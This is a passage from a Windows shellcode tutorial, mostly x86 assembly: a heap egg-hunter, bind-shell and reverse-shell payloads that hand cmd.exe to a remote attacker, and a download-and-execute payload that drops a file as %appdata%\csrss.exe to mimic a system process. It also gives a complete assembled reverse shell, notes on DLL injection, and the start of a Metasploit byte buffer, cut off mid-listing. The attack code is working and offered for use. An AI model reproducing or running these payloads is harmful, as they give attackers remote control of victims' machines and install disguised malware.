So you go to HeapAddress+0x58 to get the first (and usually only) segment in the heap. Then, from inside the segment, you read LastEntryInSegment at Segment+0x38. Finally, you subtract the beginning of the heap from it to get the size of the allocated memory that you will search for the mark. These offsets depend on the Windows version, so check them in a debugger on your target. Let’s see the code.

ASM
xor eax,eax
mov edx,dword ptr fs:[eax+30]     ;Get The PEB
add eax,7F
add eax,11                     ;set eax == 90 (avoiding null bytes)
mov esi,dword ptr [eax+edx]         ;edx + 90 --> *ProcessHeaps
mov ecx,dword ptr [eax+edx-8]     ;edx + 88 --> NumberOfHeaps
GET_HEAP:
lods dword ptr [esi]             ;Get Heap Entry
push ecx                     ;Save NumberOfHeaps
mov edi,eax
mov eax,dword ptr [eax+58]         ;Get 1st entry in Segments[64] array
mov ecx,dword ptr [eax+38]         ;Get LastEntryInSegment
sub ecx,edi                 ;Get SizeOfHeap
mov eax,BBBBBBBC
dec eax
NO_YET:
repne scas byte ptr es:[edi]         ;searching for the 0xBB
test ecx,ecx                ;Didn’t find?
je NEXT_HEAP                ;go to the next heap
cmp dword ptr [edi-1],eax        ;get 0xBB .. check on 0xBBBBBBBB
jnz NO_YET
add edi,3                    ;skip the rest of the mark
call edi                    ;we got it … let’s call to it
NEXT_HEAP:
pop ecx                    ;not yet, let’s go the next heap
dec ecx
test ecx,ecx                ;is it the last heap?
jnz GET_HEAP

The code is fully commented. If you assemble it, you will see that it is less than 60 bytes: not so large, and free of null bytes. I recommend that you assemble and debug it to understand the topic better, and that you read more about the heap and its allocation mechanism.

4. Part 3: The Payload

In this part, we will talk about the payload. The payload is what the attacker intends to do: it is the reason the whole shellcode is written.

All the payloads we describe are based on network communication. As you know, the main goal of an attacker is to control the machine, send it commands, or receive sensitive information from the victim.

Communication in any operating system is based on sockets. A socket is an endpoint of communication, like your telephone or your mobile, and it is the handle for any network communication inside the OS.

A socket can act as a client and connect to another machine, or it can act as a server. I won’t go deep into this, as I assume you know about client/server communication, the IP (the internet address) and the port (a number that identifies the application that connects to the network or listens for a connection).

Now let’s talk about programming.

4.1 Socket Programming

To begin using sockets, you first call WSAStartup() to specify the version you want to use and to get more details about the socket interface in this Windows version. The API looks like this:

C++
int WSAStartup ( WORD wVersionRequired, LPWSADATA lpWSAData );

Calling it is very easy. It’s like this:

C++
WSADATA wsaData;
WSAStartup( 0x190, &wsaData );

After that, you need to create your socket. We will use the WSASocketA API for this. All of these APIs come from the WS2_32.dll library. The prototype of this API is:

C++
SOCKET WSASocketA ( int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags );

The 1st argument is af (the address family); for IPv4, which is all we need here, it is AF_INET. The 2nd argument defines the type of the transport layer (TCP or UDP). As we use TCP, we pass SOCK_STREAM.

The other arguments are not important here and you can set them to 0.

Now we have the telephone (socket) that we will communicate with. Next, we decide whether we want to connect to a server or to wait (listen) for a connection from a client.

To connect to a server, you need its IP and port. The connect API is:

C++
int connect (SOCKET s,const struct sockaddr* name,int namelen);

The ‘name’ argument is a structure that holds the address family, the IP and the port, and ‘namelen’ is the size of that structure. To listen on a port, you call 2 APIs (bind and listen). These APIs are similar to the connect API, as you see:

C++
int bind(int sockfd, struct sockaddr *my_addr, int addrlen);
int listen(int sockfd, int backlog);

The differences between bind and connect are:

  1. In bind, you usually set the IP to INADDR_ANY, which means that you accept connections on any local address
  2. The port in bind is the port that you listen on, waiting for connections to it

The listen API starts listening on that port, given the socket (the 2nd parameter is unimportant for now).

To receive a connection and accept it, you call the accept API. Its prototype is:

C++
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

This API takes the listening socket and returns 3 values:

  1. The socket of the connecting peer. You use it for every send and recv. You use your own listening socket only on close, to stop accepting incoming connections
  2. addr: the IP and the port of the connecting peer
  3. addrlen: the size of the sockaddr structure
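The order of the calls (socket, bind, listen, accept on one side; socket, connect on the other) is the same in every sockets API. The Python sketch below walks through that sequence with a harmless ping/pong exchange on the loopback address. It uses Python’s standard socket module rather than Winsock, and the message contents and helper name are assumptions for this example.

```python
import socket
import threading


def run_server(listener: socket.socket, received: list) -> None:
    """accept() one client, read its message, answer, then close the connection."""
    conn, peer = listener.accept()        # conn is the new socket for this client
    with conn:
        received.append(conn.recv(1024))
        conn.sendall(b"pong")


listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free port
listener.listen(1)
port = listener.getsockname()[1]

received = []
server = threading.Thread(target=run_server, args=(listener, received))
server.start()

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", port))
client.sendall(b"ping")
reply = client.recv(1024)
client.close()

server.join()
listener.close()
print(received[0], reply)
```

Notice that the server talks to the client through the socket returned by accept, not through the listening socket.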

Now you have an established connection, and you can use send and recv to communicate. For our shell, however, we will use CreateProcessA to start cmd.exe (“CMD”) and redirect its standard input, output and error directly to the attacker through the connection we established. I will show you everything in the payloads.

4.2 Bind Shell Payload

I’ll assume that you have resolved the needed APIs and are ready to write the payload. I’ll list the payload code in assembly. At the end, I’ll put everything together and give you a complete shellcode.

ASM
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket (the phone that will connect to or listen for the client)
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Mov sAddr.sin_addr, Esi ;INADDR_ANY
Lea Eax, sAddr
Push 10H
Push Eax
Push Edi
Call bind
Push 0
Push Edi
Call listen
Push Esi
Push Esi
Push Edi
Call accept
Mov Edi, Eax
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
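Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx ;lpProcessInformation
Push Edx ;lpStartupInfo
Push Esi ;lpCurrentDirectory = NULL
Push Esi ;lpEnvironment = NULL
Push Esi ;dwCreationFlags = 0
Push 1 ;bInheritHandles = TRUE
Push Esi ;lpThreadAttributes = NULL
Push Esi ;lpProcessAttributes = NULL
Push Eax ;lpCommandLine --> "CMD"
Push Esi ;lpApplicationName = NULL
Call CreateProcessA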
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;stored as bytes 11 5C == 115CH == 4444 in network byte order

As you see in this code, we first call WSAStartup, then we create our socket and call bind and listen to prepare our server.

Before calling bind, we get the port number from the last 2 bytes of the shellcode: the delta plus the offset of these last 2 bytes is saved in DataOffset. We then read the port number from there and listen on this port.
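The port constant looks odd because sin_port is stored in network byte order (big endian), while a DW directive on x86 writes its value in little endian. The Python sketch below computes the value to place after DW for a given port and builds the 16-byte structure that bind receives. The helper names are assumptions, and AF_INET is hard-coded to 2, its value on Windows.

```python
import socket
import struct


def port_word_for_dw(port: int) -> int:
    """Value to write after DW so that memory holds the port in network byte order."""
    network_bytes = struct.pack(">H", port)          # big endian, as sin_port expects
    return struct.unpack("<H", network_bytes)[0]     # how a little-endian DW reads them


def sockaddr_in(port: int, ip: str = "0.0.0.0") -> bytes:
    """16-byte sockaddr_in: family (AF_INET = 2), port, IPv4 address, 8 bytes of padding."""
    return struct.pack("<H", 2) + struct.pack(">H", port) + socket.inet_aton(ip) + b"\x00" * 8


print(hex(port_word_for_dw(4444)))
print(sockaddr_in(4444).hex(" "))
```

The address 0.0.0.0 is INADDR_ANY, and the total length of 16 bytes is the 10H that the payload pushes before calling bind.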

You will not see the steps we do to get the delta and the data offset in Listing 4.2.1 as we described it in getting the delta section. And I will put all these parts together again in a complete shellcode.

After that, we prepare the call to CreateProcessA. The API prototype is:

C++
BOOL CreateProcess(
    LPCTSTR lpApplicationName,    // pointer to name of executable module
    LPTSTR lpCommandLine,    // pointer to command line string
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,    // handle inheritance flag
    DWORD dwCreationFlags,    // creation flags
    LPVOID lpEnvironment,    // pointer to new environment block
    LPCTSTR lpCurrentDirectory,    // pointer to current directory name
    LPSTARTUPINFO lpStartupInfo,    // pointer to STARTUPINFO
    LPPROCESS_INFORMATION lpProcessInformation     // pointer to PROCESS_INFORMATION
);

Most of these parameters are unimportant to us, except for 3:

  1. lpCommandLine: We set this argument to “CMD” to refer to the command shell
  2. lpStartupInfo: Through this argument, we make the process send its output to the socket and take its input from it
  3. lpProcessInformation: That’s where CreateProcess outputs the process ID, thread ID and related information. This data is not important to us, but we must allocate space equal to the size of the PROCESS_INFORMATION structure.
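The “CMD” command line is not stored as data in the listing; it is built on the stack by three pushes. The Python sketch below only models which bytes end up at ESP. The helper name stack_after is made up for this illustration, and the values follow MASM's convention that a literal such as 'MC' is assembled as 4D43H.

```python
import struct

def stack_after(pushes):
    """Return the bytes found at ESP after a series of (value, size) pushes.

    Each push lands below the previous one, so the last push comes first.
    """
    mem = b""
    for value, size in pushes:
        fmt = "<H" if size == 2 else "<I"
        mem = struct.pack(fmt, value) + mem
    return mem

# Xor Eax,Eax / Push Ax / Mov Al,'D' / Push Eax / Mov Ax,'MC' / Push Ax
cmd = stack_after([(0x0000, 2), (0x00000044, 4), (0x4D43, 2)])

# Xor Eax,Eax / Mov Ax,'23' / Push Eax / Push '_2SW'
ws2 = stack_after([(0x00003233, 4), (0x5F325357, 4)])

print(cmd, ws2)
```

Both strings come out null-terminated because the register was zeroed before its low bytes were loaded, which is also why no literal zero appears in the instruction encoding.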

As you can see, we allocate a local variable for lpStartupInfo and set all of its fields to zero. After that, we set the standard input, output and error handles to the socket returned from the accept API (the attacker's socket) to redirect the input and output to the attacker.
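To see why the listing can load `SizeOf Startup` into Cl and write dwFlags as a single word, the 32-bit layouts of the two structures can be modelled in Python with ctypes. This is a sketch for checking sizes and offsets only; the class names with the 32 suffix are made up here, and every pointer or HANDLE is represented as a 4-byte integer so the result does not depend on the machine running the script.

```python
import ctypes

DWORD, WORD = ctypes.c_uint32, ctypes.c_uint16
PTR32 = ctypes.c_uint32  # stand-in for a 32-bit pointer or HANDLE

class STARTUPINFOA32(ctypes.Structure):
    _fields_ = [
        ("cb", DWORD), ("lpReserved", PTR32), ("lpDesktop", PTR32),
        ("lpTitle", PTR32), ("dwX", DWORD), ("dwY", DWORD),
        ("dwXSize", DWORD), ("dwYSize", DWORD),
        ("dwXCountChars", DWORD), ("dwYCountChars", DWORD),
        ("dwFillAttribute", DWORD), ("dwFlags", DWORD),
        ("wShowWindow", WORD), ("cbReserved2", WORD),
        ("lpReserved2", PTR32), ("hStdInput", PTR32),
        ("hStdOutput", PTR32), ("hStdError", PTR32),
    ]

class PROCESS_INFORMATION32(ctypes.Structure):
    _fields_ = [("hProcess", PTR32), ("hThread", PTR32),
                ("dwProcessId", DWORD), ("dwThreadId", DWORD)]

STARTF_USESHOWWINDOW = 0x001
STARTF_USESTDHANDLES = 0x100
flags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW

print(ctypes.sizeof(STARTUPINFOA32), ctypes.sizeof(PROCESS_INFORMATION32),
      STARTUPINFOA32.dwFlags.offset, hex(flags))
```

Both sizes fit in one byte and the combined flag value fits in 16 bits, so the byte-sized and word-sized moves in the listing are enough once the structures have been zeroed.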

At the end, we create our process and then call WaitForSingleObject to wait for it to finish. Nothing breaks if you don’t call WaitForSingleObject, but waiting lets you close the connection and the sockets after the process finishes.

4.3 Reverse Shell Payload

The Reverse Shell is very similar to the Bind Shell as you see in the code below:

ASM
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket (the "phone" that connects to or listens for the client)
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Inc Ebx
Inc Ebx
Push Ebx
Call gethostbyname
Mov Ebx, [Eax + 1CH] ;IP
Mov sAddr.sin_addr, Ebx
Lea Eax, sAddr
Push SizeOf sAddr
Push Eax
Push Edi
Call connect
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Esi
Push Esi
Push Esi
Push 1
Push Esi
Push Esi
Push Eax
Push Esi
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;5C11H == 4444 (port 4444)
IP DB "127.0.0.1", 0

In the reverse shell, we take the IP from the DATA at the end of the shellcode. Then, we call gethostbyname(name), which takes the host name (a website, localhost or an IP) and returns a pointer to a structure named hostent that holds the information about the host.

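The hostent structure has a member named h_addr_list that leads to the IP of the host. The code reads the IP directly from offset 0x1C of the returned buffer. Note that in the documented 32-bit hostent layout, h_addr_list itself sits at offset 0x0C and is a pointer to a list of address pointers, so the 0x1C shortcut depends on how Winsock lays out the data that follows the structure.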

So we take the IP from the hostent data and pass it to the connect API to connect to the attacker's server. After that, we create the command shell process via CreateProcessA with the standard input, output and error set to our socket (the socket itself, not the return value of connect).
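For orientation, the documented 32-bit hostent layout and the value that ends up in sin_addr can be modelled in Python. This is a sketch for checking offsets only: the class name HOSTENT32 is made up here, and pointers are represented as 4-byte integers. The documented structure is 16 bytes long with h_addr_list at offset 0x0C, so a read at offset 0x1C lands in whatever data the implementation places after it.

```python
import ctypes
import socket

PTR32 = ctypes.c_uint32  # stand-in for a 32-bit pointer

class HOSTENT32(ctypes.Structure):
    _fields_ = [
        ("h_name", PTR32),               # char *
        ("h_aliases", PTR32),            # char **
        ("h_addrtype", ctypes.c_int16),
        ("h_length", ctypes.c_int16),
        ("h_addr_list", PTR32),          # char ** (list of address pointers)
    ]

# The address itself is 4 bytes in network byte order.
addr = socket.inet_aton("127.0.0.1")
# Value a 32-bit little-endian Mov would hold after loading those bytes.
sin_addr = int.from_bytes(addr, "little")

print(ctypes.sizeof(HOSTENT32), HOSTENT32.h_addr_list.offset,
      addr.hex(), hex(sin_addr))
```

Copying the 4 bytes with a plain Mov keeps them in network order, which is what sin_addr expects.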

Now we can create bind shell and reverse shell payloads. Let’s jump to the last payload we have: download & execute.

4.4 Download & Execute Payload

There are many ways to create a DownExec shellcode, so I decided to choose the easiest (and smallest) one.

I decided to use a very powerful and easy-to-use API named URLDownloadToFileA, exported by urlmon.dll.

This API takes 5 parameters, but only 2 of them matter here (the other 3 are passed as zero):

  1. URL: The URL to download the file from
  2. Filename: The place where you need to save the file in (including the name of the file)

It’s very simple to use as you see in the code below:

ASM
Mov Edi, URLOffset
Xor Eax, Eax
Mov Al, 90H
Repne Scasb
Mov Byte Ptr [Edi - 1], Ah
Mov Filename, Edi
Mov Al, 200
Sub Esp, Eax
Mov Esi, Esp
Push Eax
Push Esi
Push Edi
Call ExpandEnvironmentStringsA
Xor Eax, Eax
Push Eax
Push Eax
Push Esi
Push URLOffset
Push Eax
Call URLDownloadToFileA
Mov Edi, Eax
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Eax
Push Eax
Push Eax
Push 1
Push Eax
Push Eax
Push Esi
Push Eax
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
URL DB "http://localhost:3000/1.exe", 90H
Filename DB "%appdata%\csrss.exe", 0

In this code, we call the ExpandEnvironmentStringsA API. This API expands environment-variable references such as %appdata% or %windir% into the equivalent paths (for example, C:\Windows\...).
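The expansion itself is simple string substitution. The Python sketch below imitates the behaviour on a supplied dictionary so it can run anywhere; it is not the Windows API, the function name expand_percent_vars is made up, and the APPDATA value and file name are hypothetical.

```python
import re

def expand_percent_vars(text, env):
    """Replace %NAME% with env[NAME]; names are matched case-insensitively
    and unknown names are left untouched."""
    lookup = {key.upper(): value for key, value in env.items()}

    def replace(match):
        return lookup.get(match.group(1).upper(), match.group(0))

    return re.sub(r"%([^%]+)%", replace, text)

env = {"APPDATA": r"C:\Users\demo\AppData\Roaming"}  # hypothetical value
print(expand_percent_vars(r"%appdata%\report.txt", env))
print(expand_percent_vars(r"%nosuchvar%\report.txt", env))
```

The real API also needs a destination buffer and its size, which is why the listing reserves 200 bytes on the stack before the call.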

This API is important if you need to write files to the Application Data folder, to My Documents or inside the Windows directory. So, we expand our filename to save the malicious file inside the application data folder (a hidden folder that is writable on Windows Vista & 7) under the name csrss.exe.

Then, we call URLDownloadToFileA to download the malicious file, and finally we execute it with CreateProcessA.

Alternatively, you can download a DLL file and start it using LoadLibrary. You can also inject this library into another process by using WriteProcessMemory and CreateRemoteThread.

To do that, you inject the Filename string into the other process and then call CreateRemoteThread with LoadLibrary as the thread start address and the injected string as the argument of the LoadLibrary API.

4.5 Put All Together

The code below is assembled with MASM, and the editor is EasyCode Masm:

ASM
.Const
LoadLibraryAConst Equ 3A75C3C1H
CreateProcessAConst Equ 26813AC1H
WaitForSingleObjectConst Equ 0C4679698H
WSAStartupConst Equ 0EBD1EDFEH
WSASocketAConst Equ 0DD7C4481H
listenConst Equ 9A761FF0H
connectConst Equ 42C02958H
bindConst Equ 080FF799H
acceptConst Equ 0C9C4EFB7H
gethostbynameConst Equ 0F932AA6DH
recvConst Equ 06135F3AH
.Code
Assume Fs:Nothing
Shellcode:
GETDELTA:
Jmp NEXT
PREV:
Pop Ebx
Jmp END_GETDELTA
NEXT:
Call PREV
END_GETDELTA:
Mov Eax, Ebx
Mov Cx, (Offset END_GETDELTA - Offset MainShellcode)
Neg Cx
Add Ax, Cx
Jmp Eax
;Inputs:
;-------
;Esi --> Kernelbase
;Ebx -->The ArrayOfAPIs
GetAPIs Proc
Local AddressFunctions:DWord
Local AddressOfNameOrdinals:DWord
Local AddressNames:DWord
Local NumberOfNames:DWord
Getting_PE_Header:
Mov Edi, Esi ;Kernel32 imagebase
Mov Eax, [Esi].IMAGE_DOS_HEADER.e_lfanew
Add Esi, Eax ;Esi-->PE Header Edi-->MZ Header
Getting_Export_Table:
Mov Eax, [Esi].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[0].VirtualAddress
Add Eax, Edi
Mov Esi, Eax
Getting_Arrays:
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
Add Eax, Edi
Mov AddressFunctions, Eax ;the first array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
Add Eax, Edi
Mov AddressOfNameOrdinals, Eax ;the second array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNames
Add Eax, Edi
Mov AddressNames, Eax ;the third array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.NumberOfNames
Mov NumberOfNames, Eax ;the number of APIs
Push Esi
Mov Esi, AddressNames
Xor Ecx, Ecx
GetTheAPIs:
Lodsd
Push Esi
Lea Esi, [Eax + Edi] ;RVA + imagebase = VA
Xor Edx,Edx
Xor Eax,Eax
Checksum_Calc:
Lodsb
Test Al, Al ;Avoid the null byte in Cmp Eax,0
Jz CheckFunction
IMul Eax, Edx
Xor Edx,Eax
Inc Edx
Jmp Checksum_Calc
CheckFunction:
Pop Esi
Xor Eax, Eax ;The index of this API
Cmp Edx, LoadLibraryAConst
Jz FoundAddress
Inc Eax
Cmp Edx, CreateProcessAConst
Jz FoundAddress
Inc Eax
Cmp Edx, WaitForSingleObjectConst
Jz FoundAddress
Inc Eax
Cmp Edx, WSAStartupConst
Jz FoundAddress
Inc Eax
Cmp Edx, WSASocketAConst
Jz FoundAddress
Inc Eax
Cmp Edx, listenConst
Jz FoundAddress
Inc Eax
Cmp Edx, connectConst
Jz FoundAddress
Inc Eax
Cmp Edx, bindConst
Jz FoundAddress
Inc Eax
Cmp Edx, acceptConst
Jz FoundAddress
Inc Eax
Cmp Edx, gethostbynameConst
Jz FoundAddress
Inc Eax
Cmp Edx, recvConst
Jz FoundAddress
Xor Eax, Eax
Inc Ecx
Cmp Ecx, NumberOfNames
Jz EndFunc
Jmp GetTheAPIs
FoundAddress:
Mov Edx, Esi ;save it temporary in edx
Pop Esi ;Esi --> PE Header
Push Ecx
Push Eax ;save the index of the API
Mov Eax, AddressOfNameOrdinals
Movzx Ecx, Word Ptr [Eax + Ecx * 2]
Mov Eax, AddressFunctions
Mov Eax, DWord Ptr [Eax + Ecx * 4]
Add Eax, Edi
Pop Ecx ;Get The Index of the API
Mov [Ebx + Ecx * 4], Eax
Pop Ecx
Inc Ecx
Push Esi
Mov Esi, Edx
Jmp GetTheAPIs
EndFunc:
Mov Esi, Edi
Ret
GetAPIs EndP
MainShellcode Proc
Local recv:DWord
Local gethostbyname:DWord
Local accept:DWord
Local bind:DWord
Local connect:DWord
Local listen:DWord
Local WSASocketA:DWord
Local WSAStartup:DWord
Local WaitForSingleObject:DWord
Local CreateProcessA:DWord
Local LoadLibraryA:DWord
Local DataOffset:DWord
Local WSAStartupData:WSADATA
Local socket:DWord
Local sAddr:sockaddr_in
Local Startup:STARTUPINFO
Local ProcInfo:PROCESS_INFORMATION
Local Ali:hostent
Add Bx, Offset DATA - Offset END_GETDELTA
Mov DataOffset, Ebx
;-----------------------------------------
;Getting Kernel Imagebase
;-----------------------------------------
Xor Ecx, Ecx
Add Ecx, 30H
Mov Eax, DWord Ptr Fs:[Ecx]
Mov Eax, DWord Ptr [Eax + 0CH]
Mov Ecx, DWord Ptr [Eax + 1CH]
Mov Ecx, DWord Ptr [Ecx]
Mov Esi, DWord Ptr [Ecx + 8H]
;-----------------------------------------
;Getting APIs
;-----------------------------------------
Lea Ebx, LoadLibraryA
Call GetAPIs
Xor Eax, Eax
Mov Ax, '23'
Push Eax
Push '_2SW'
Push Esp
Call LoadLibraryA
Mov Esi, Eax
Call GetAPIs
;-----------------------------------------
;Payload : Reverse Shell
;-----------------------------------------
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket (the "phone" that connects to or listens for the client)
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Inc Ebx
Inc Ebx
Push Ebx
Call gethostbyname
Mov Ebx, [Eax + 1CH] ;IP
Mov sAddr.sin_addr, Ebx
Lea Eax, sAddr
Push SizeOf sAddr
Push Eax
Push Edi
Call connect
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Esi
Push Esi
Push Esi
Push 1
Push Esi
Push Esi
Push Eax
Push Esi
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;5C11H == 4444 (port 4444)
IP DB "127.0.0.1", 0
End Shellcode

In this code, we begin by getting the delta and jumping to MainShellcode. This function begins by getting the APIs from kernel32.dll, then loads ws2_32.dll with LoadLibraryA and gets its APIs.
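GetAPIs does not compare export names as strings; it compares a 32-bit checksum of each name against the constants in the .Const section. The Python function below is a line-by-line transcription of the Checksum_Calc loop, written only to make the arithmetic easier to follow. Whether it reproduces the constants listed under .Const has not been checked here, and the function name name_checksum is made up.

```python
def name_checksum(name: bytes) -> int:
    """Transcription of the Checksum_Calc loop (EAX and EDX start at zero)."""
    eax = 0
    edx = 0
    for byte in name:
        if byte == 0:                      # Test Al, Al / Jz CheckFunction
            break
        eax = (eax & 0xFFFFFF00) | byte    # Lodsb replaces only AL
        eax = (eax * edx) & 0xFFFFFFFF     # IMul Eax, Edx (low 32 bits kept)
        edx ^= eax                         # Xor Edx, Eax
        edx = (edx + 1) & 0xFFFFFFFF       # Inc Edx
    return edx

for sample in (b"A", b"AB", b"ABC"):
    print(sample, hex(name_checksum(sample)))
```

Note that Lodsb leaves the upper 24 bits of EAX holding the previous product, so each step depends on more than the current character.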

Then, it begins its payload normally and connects to the attacker and spawns the shell.

This code is null-free. It includes only one null byte, and it’s the last byte (the terminator of the string).
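A quick way to confirm a claim like this on any byte string is to list the offsets of the unwanted bytes. The Python sketch below runs the check on the DATA section from the listing only (the port word followed by the IP string); the helper name find_bad_bytes is made up for this illustration.

```python
import struct

def find_bad_bytes(code: bytes, bad: bytes = b"\x00"):
    """Return the offsets of every byte in `code` that appears in `bad`."""
    return [offset for offset, value in enumerate(code) if value in bad]

# DATA section of the listing: Port DW 5C11H, then IP DB "127.0.0.1", 0
data = struct.pack("<H", 0x5C11) + b"127.0.0.1" + b"\x00"

print(find_bad_bytes(data), len(data) - 1)
```

The only offset reported is the last one, the string terminator. The same helper accepts other restricted bytes through the `bad` argument.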

Now, we will see how to set up your shellcode in Metasploit so that it is available for use in your exploits.

5. Part 4: Implement your Shellcode into Metasploit

In this part, I will implement the Download & Execute shellcode in Metasploit. To implement your shellcode, you first need to convert it into a Ruby buffer like this:

Buf = "\xCC\xCC"+
"\xCC\xCC"

So, I converted my shellcode into a Ruby buffer like this (without the 2 strings: URL, Filename):

"\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF"+
"\xFF\xFF\x8B\xC3\x66\xB9\x3F\xFF"+
"\x66\xF7\xD9\x66\x03\xC1\xFF\xE0"+
"\x55\x8B\xEC\x83\xC4\xF0\x8B\xFE"+
"\x8B\x46\x3C\x03\xF0\x8B\x46\x78"+
"\x03\xC7\x8B\xF0\x8B\x46\x1C\x03"+
"\xC7\x89\x45\xFC\x8B\x46\x24\x03"+
"\xC7\x89\x45\xF8\x8B\x46\x20\x03"+
"\xC7\x89\x45\xF4\x8B\x46\x18\x89"+
"\x45\xF0\x56\x8B\x75\xF4\x33\xC9"+
"\xAD\x56\x8D\x34\x07\x33\xD2\x33"+
"\xC0\xAC\x84\xC0\x74\x08\x0F\xAF"+
"\xC2\x33\xD0\x42\xEB\xF3\x5E\x33"+
"\xC0\x81\xFA\xC1\xC3\x75\x3A\x74"+
"\x37\x40\x81\xFA\xC1\x3A\x81\x26"+
"\x74\x2E\x40\x81\xFA\x98\x96\x67"+
"\xC4\x74\x25\x40\x81\xFA\xC1\x37"+
"\xE1\x43\x74\x1C\x40\x81\xFA\xC1"+
"\xF7\x63\xBE\x74\x13\x40\x81\xFA"+
"\x58\x29\xC0\x42\x74\x0A\x33\xC0"+
"\x41\x3B\x4D\xF0\x74\x21\xEB\xA8"+
"\x8B\xD6\x5E\x51\x50\x8B\x45\xF8"+
"\x0F\xB7\x0C\x48\x8B\x45\xFC\x8B"+
"\x04\x88\x03\xC7\x59\x89\x04\x8B"+
"\x59\x41\x56\x8B\xF2\xEB\x89\x8B"+
"\xF7\xC9\xC3\x55\x8B\xEC\x83\xC4"+
"\x8C\x66\x81\xC3\x6F\x01\x89\x5D"+
"\xE4\x33\xC9\x83\xC1\x30\x64\x8B"+
"\x01\x8B\x40\x0C\x8B\x48\x1C\x8B"+
